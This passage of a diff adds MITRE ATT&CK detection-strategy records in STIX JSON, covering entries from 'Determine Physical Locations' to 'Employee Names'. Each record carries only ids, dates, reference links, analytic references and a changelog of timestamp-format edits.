+                    "id": "x-mitre-detection-strategy--59dd7be2-7f37-4b8c-a1a7-3ed71d37cac8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0806",
+                            "external_id": "DET0806"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Determine Physical Locations",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cf5aa9ca-0f1b-4707-94af-484228fd6199"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ad9b54d-cd23-4ec3-a5b2-db5e58e82a02",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0853",
+                            "external_id": "DET0853"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Develop Capabilities",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--97b0c549-88d2-4739-a081-a9113e25cf1a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4cadb231-5487-4135-834b-d0db75a93a45",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0848",
+                            "external_id": "DET0848"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Digital Certificates",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--babb8a91-12af-4f2d-be59-2df099acc06c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--15afa7ae-955a-4c19-b48e-ad13b68d7a54",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0831",
+                            "external_id": "DET0831"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Digital Certificates",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--24e641ec-e64a-4f2c-91b1-8bd400e97547"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2e8be762-9987-4f19-997d-2f7c7540b8e1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0844",
+                            "external_id": "DET0844"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Digital Certificates",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--06c3cd77-148a-424e-a55e-1e11ff3d9504"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f40c0c98-76fe-4e2a-970a-0491f52a9a47",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0211",
+                            "external_id": "DET0211"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Direct VM Console Access via Cloud-Native Methods",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--926f4550-8c47-4882-afb3-1f0832c8d3b9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ee674b38-f59a-4f21-860a-19d065e13aaf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0426",
+                            "external_id": "DET0426"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Direct Volume Access for File System Evasion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--126a43e3-7b39-4312-ba15-aab0f7ce78f9",
+                        "x-mitre-analytic--892f06ae-6a95-438b-8219-49b3384a4d24"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--acb9a314-aa08-4a0f-b3ba-201d87fa4cc8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0145",
+                            "external_id": "DET0145"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Disabled or Modified System Firewalls across OS Platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--df0f8f0a-1e92-415d-b15e-63cea928973a",
+                        "x-mitre-analytic--3327048a-e90c-47e5-9b67-d2ecaa89523c",
+                        "x-mitre-analytic--38c74fcf-2a4d-45cd-8465-b5d80a605bd8",
+                        "x-mitre-analytic--1fecb6f7-e72f-452e-a078-3298cba8d481",
+                        "x-mitre-analytic--1216ae5e-bc5c-4672-a216-2706fb9ba3df"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bcc3656b-82bf-44d7-a4e8-c5da5ce2e7ab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0847",
+                            "external_id": "DET0847"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Domain Properties",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4ba44323-b5b0-46c9-be94-f2c5d0fdbec5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3414f3b8-17a2-438c-8bbc-a261a04da8bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0007",
+                            "external_id": "DET0007"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Domain Trust Discovery via API, Script, and CLI Enumeration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c3be6c4a-3b3d-4a37-a1d8-2c4df915a7aa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3eb428c7-5192-4ae2-a5a3-022ca9695ec8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0270",
+                            "external_id": "DET0270"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Domain or Tenant Policy Modifications via AD and Identity Provider",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f403ae40-31ff-4550-b21f-e1c24315276d",
+                        "x-mitre-analytic--65a1926d-e504-4153-b19f-555e8a06e5a5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--354dfdf4-9da9-45b5-909c-13f5702fc263",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0892",
+                            "external_id": "DET0892"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Domains",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--68a7b414-9864-46c6-b629-bec6f07b5c31"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dce8edf3-894f-4857-8f85-04db84bcebd9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0863",
+                            "external_id": "DET0863"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Domains",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0cadbf9f-befa-4bd8-85b8-e5af53383953"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3e6efcf8-8308-4832-b247-ce08703c7ed9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0825",
+                            "external_id": "DET0825"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Drive-by Target",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f1e4a6ae-86b5-4cf1-a044-0ffc6551196e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4c5608c3-b5ca-4c8e-932e-ad6c55683cd1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0835",
+                            "external_id": "DET0835"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Email Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8619af40-05db-49a7-b7b8-476facfd4b2c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d50c5f8f-0091-4675-8264-abcb4247de26",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0861",
+                            "external_id": "DET0861"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Email Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ab74118c-05e1-4acd-b1c2-445d1f7c5fd1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--33040f26-43e3-4c1d-8557-02f306bb028f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0814",
+                            "external_id": "DET0814"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Email Addresses",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b123fe68-1da5-4c80-b4f0-f3d476891e11"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3268135a-a73f-4594-95e6-6ea8813a39d3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0857",
+                            "external_id": "DET0857"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Employee Names",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8a75f571-49f8-4df8-b02c-fad2189273ee"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--095e0e71-498f-4403-a69f-5a6e4ff50503",
